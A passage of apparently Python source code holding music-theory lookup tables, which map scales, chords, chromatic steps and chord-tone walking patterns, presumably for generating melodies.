'D': [ 'G'],
'G': [ 'C'],
'F': [ 'B'],
'Ds': [ 'Gs'],
},
'GMinor': {
'A': [ 'D'],
'C': [ 'F'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'A'],
},
'AMinor': {
'A': [ 'D'],
'C': [ 'F'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'B'],
},
'FsMajor': {
'Fs': [ 'B'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'B': [ 'F'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'DMajor': {
'A': [ 'D'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'Cs'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
},
}
PosChromatics = {
'C': 'Cs' ,
'Cs': 'D' ,
'D': 'Ds' ,
'Ds': 'E' ,
'E': 'F',
'F': 'Fs' ,
'Fs': 'G' ,
'G': 'Gs' ,
'Gs': 'A' ,
'A': 'As' ,
'As': 'B' ,
'B': 'C' ,
}
NegChromatics = {
'C': 'B' ,
'Cs': 'C' ,
'D': 'Cs' ,
'Ds': 'D' ,
'E': 'Ds',
'F': 'E' ,
'Fs': 'F' ,
'G': 'Fs' ,
'Gs': 'G' ,
'A': 'Gs' ,
'As': 'A' ,
'B': 'As' ,
}
StartingPieceNotes = { # start piece with either Tonic or Dominant note for that scale
'CMajor': [ 'C', 'G' ],
}
#ChordsToScale List
ChordsToScale = {
'AMinor': [ 'AMinor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor' ],
'CDim': [ 'CsMajor', 'AsMinor' ],
'Gs7': [ 'GsMajor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'GMaj7': [ 'GMajor', 'CMajor', 'BMinor', 'GMajor', 'EMinor', 'CHMinor', 'AMinor', 'DMajor' ],
'GsDim': [ 'FsMinor', 'AMajor', 'CHMinor' ],
'GsMajor': [ 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'Fs7': [ 'FsMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor' ],
'CMajor': [ 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'Em7': [ 'EMinor', 'CMajor', 'BMinor', 'GMajor', 'EMinor', 'AMinor', 'DMajor' ],
'Dsm7': [ 'DsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor' ],
'Gsm7': [ 'GsMinor', 'CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'CHMinor', 'FsMajor' ],
'DMaj7': [ 'DMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'Dm7': [ 'DMinor', 'CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'Cm7': [ 'CMinor', 'GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor' ],
'CsMinor': [ 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'FsMinor': [ 'FsMinor', 'BMinor', 'CsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'DsMaj7': [ 'DsMajor', 'GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'GMinor' ],
'BMaj7': [ 'BMajor', 'CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor' ],
'GMajor': [ 'GMajor', 'CMajor', 'BMinor', 'EMinor', 'CHMinor', 'AMinor', 'DMajor' ],
'EMinor': [ 'EMinor', 'CMajor', 'BMinor', 'GMajor', 'AMinor', 'DMajor' ],
'CsMaj7': [ 'CsMajor', 'GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'FDim': [ 'DsMinor', 'CHMinor', 'FsMajor' ],
'DMinor': [ 'DMinor', 'CMajor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'FMajor': [ 'FMajor', 'CMajor', 'DMinor', 'AsMajor', 'GMinor', 'AMinor' ],
'ADim': [ 'AsMajor', 'GMinor' ],
'CMinor': [ 'CMinor', 'GsMajor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor' ],
'EDim': [ 'DMinor', 'FMajor' ],
'B7': [ 'BMajor', 'CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor' ],
'AMajor': [ 'AMajor', 'BMinor', 'CsMinor', 'FsMinor', 'EMajor', 'DMajor' ],
'A7': [ 'AMajor', 'BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'Fm7': [ 'FMinor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'DsMajor': [ 'DsMajor', 'GsMajor', 'CMinor', 'AsMajor', 'FMinor', 'GMinor' ],
'E7': [ 'EMajor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'C7': [ 'CMajor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'GsMinor': [ 'GsMinor', 'CsMinor', 'BMajor', 'DsMinor', 'EMajor', 'CHMinor', 'FsMajor' ],
'Bm7': [ 'BMinor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'G7': [ 'GMajor', 'CMajor', 'BMinor', 'GMajor', 'EMinor', 'CHMinor', 'AMinor', 'DMajor' ],
'Asm7': [ 'AsMinor', 'GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'BMajor': [ 'BMajor', 'CsMinor', 'GsMinor', 'DsMinor', 'EMajor', 'FsMajor' ],
'Ds7': [ 'DsMajor', 'GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'GMinor' ],
'GsMaj7': [ 'GsMajor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'AsMinor': [ 'AsMinor', 'GsMajor', 'CsMajor', 'DsMinor', 'FMinor', 'FsMajor' ],
'BDim': [ 'CMajor', 'CHMinor', 'AMinor' ],
'AsMajor': [ 'AsMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'GMinor' ],
'AMaj7': [ 'AMajor', 'BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'DMajor': [ 'DMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor' ],
'AsDim': [ 'GsMinor', 'BMajor' ],
'Fsm7': [ 'FsMinor', 'BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'Cs7': [ 'CsMajor', 'GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'Gm7': [ 'GMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor' ],
'DDim': [ 'CMinor', 'DsMajor', 'CHMinor' ],
'CsMajor': [ 'CsMajor', 'GsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'FMinor': [ 'FMinor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'CHMinor' ],
'EMajor': [ 'EMajor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor' ],
'As7': [ 'AsMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor' ],
'F7': [ 'FMajor', 'CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'FMaj7': [ 'FMajor', 'CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'FsDim': [ 'GMajor', 'EMinor' ],
'GDim': [ 'GsMajor', 'FMinor' ],
'GMinor': [ 'GMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor' ],
'CsDim': [ 'BMinor', 'DMajor' ],
'DsDim': [ 'CsMinor', 'EMajor' ],
'EMaj7': [ 'EMajor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'FsMaj7': [ 'FsMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor' ],
'BMinor': [ 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'CMaj7': [ 'CMajor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'AsMaj7': [ 'AsMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor' ],
'D7': [ 'DMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'Csm7': [ 'CsMinor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'FsMajor': [ 'FsMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor' ],
'Am7': [ 'AMinor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'DsMinor': [ 'DsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'FsMajor' ],
}
ChordToneToNextChordTone = {
'CDim': {
'CsMajor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'C'], ['Fs', 'F', 'Ds'] ] ],
'AsMinor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'C'], ['Fs', 'F', 'Ds'] ] ],
},
'Gs7': {
'GsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CMinor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'CsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'DsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'AsMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'FMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'B', 'Gs'], ['Ds', 'D', 'C'] ] ],
},
'GsDim': {
'FsMinor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'D'], ['B', 'A', 'Gs'], ['D', 'Cs', 'B'] ] ],
'AMajor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'D'], ['B', 'A', 'Gs'], ['D', 'Cs', 'B'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['Gs', 'G', 'F', 'Ds'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
},
'GsMajor': {
'GsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CMinor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'CsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'DsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'AsMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'FMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'B', 'Gs'], ['Ds', 'D', 'C'] ] ],
},
'Dm7': {
'CMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'DMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'FMajor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
'AsMajor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'GMinor': [ [ ['D', 'Ds', 'F'], ['F', 'G', 'A'], ['A', 'As', 'C', 'D'] ], [ ['D', 'C', 'As', 'A'], ['F', 'Ds', 'D'], ['A', 'G', 'F'] ] ],
'AMinor': [ [ ['D', 'E', 'F'], ['F', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['F', 'E', 'D'], ['A', 'G', 'F'] ] ],
},
'CMajor': {
'CMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'GMajor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'EMinor': [ [ ['C', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'Fs', 'E'] ] ],
'DMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'FMajor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
'AMinor': [ [ ['C', 'D', 'E'], ['E', 'F', 'G'], ['G', 'A', 'B', 'C'] ], [ ['C', 'B', 'A', 'G'], ['E', 'D', 'C'], ['G', 'F', 'E'] ] ],
},
'CsDim': {
'BMinor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'G'], ['E', 'D', 'Cs'], ['G', 'Fs', 'E'] ] ],
'DMajor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'G'], ['G', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'G'], ['E', 'D', 'Cs'], ['G', 'Fs', 'E'] ] ],
},
'DsMinor': {
'CsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'GsMinor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'BMajor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'AsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'DsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'FsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
},
'Em7': {
'CMajor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'BMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'GMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'EMinor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
'AMinor': [ [ ['E', 'F', 'G'], ['G', 'A', 'B'], ['B', 'C', 'D', 'E'] ], [ ['E', 'D', 'C', 'B'], ['G', 'F', 'E'], ['B', 'A', 'G'] ] ],
'DMajor': [ [ ['E', 'Fs', 'G'], ['G', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['G', 'Fs', 'E'], ['B', 'A', 'G'] ] ],
},
'Dsm7': {
'CsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'GsMinor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'BMajor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'E', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'AsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'C', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'DsMinor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
'FsMajor': [ [ ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'As'], ['Fs', 'F', 'Ds'], ['As', 'Gs', 'Fs'] ] ],
},
'DsDim': {
'CsMinor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'A'], ['Fs', 'E', 'Ds'], ['A', 'Gs', 'Fs'] ] ],
'EMajor': [ [ ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'Ds'] ], [ ['Ds', 'Cs', 'B', 'A'], ['Fs', 'E', 'Ds'], ['A', 'Gs', 'Fs'] ] ],
},
'DMaj7': {
'BMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'FsMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'GMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'EMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'AMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'DMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
},
'Fs7': {
'CsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'GsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'BMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'AsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'DsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'FsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
},
'Cm7': {
'GsMajor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'DsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'AsMajor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'FMinor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'G'], ['Ds', 'Cs', 'C'], ['G', 'F', 'Ds'] ] ],
'CHMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'Gs', 'B', 'C'] ], [ ['C', 'B', 'Gs', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
'GMinor': [ [ ['C', 'D', 'Ds'], ['Ds', 'F', 'G'], ['G', 'A', 'As', 'C'] ], [ ['C', 'As', 'A', 'G'], ['Ds', 'D', 'C'], ['G', 'F', 'Ds'] ] ],
},
'CsMinor': {
'CsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'FsMinor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'GsMinor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'BMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B', 'Cs'] ], [ ['Cs', 'B', 'As', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'AMajor': [ [ ['Cs', 'D', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'D', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
'EMajor': [ [ ['Cs', 'Ds', 'E'], ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B', 'Cs'] ], [ ['Cs', 'B', 'A', 'Gs'], ['E', 'Ds', 'Cs'], ['Gs', 'Fs', 'E'] ] ],
},
'FsMinor': {
'BMinor': [ [ ['Fs', 'G', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'G', 'Fs'], ['Cs', 'B', 'A'] ] ],
'CsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'FsMinor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
'AMajor': [ [ ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs'], ['Cs', 'D', 'E', 'Fs'] ], [ ['Fs', 'E', 'D', 'Cs'], ['A', 'Gs', 'Fs'], ['Cs', 'B', 'A'] ] ],
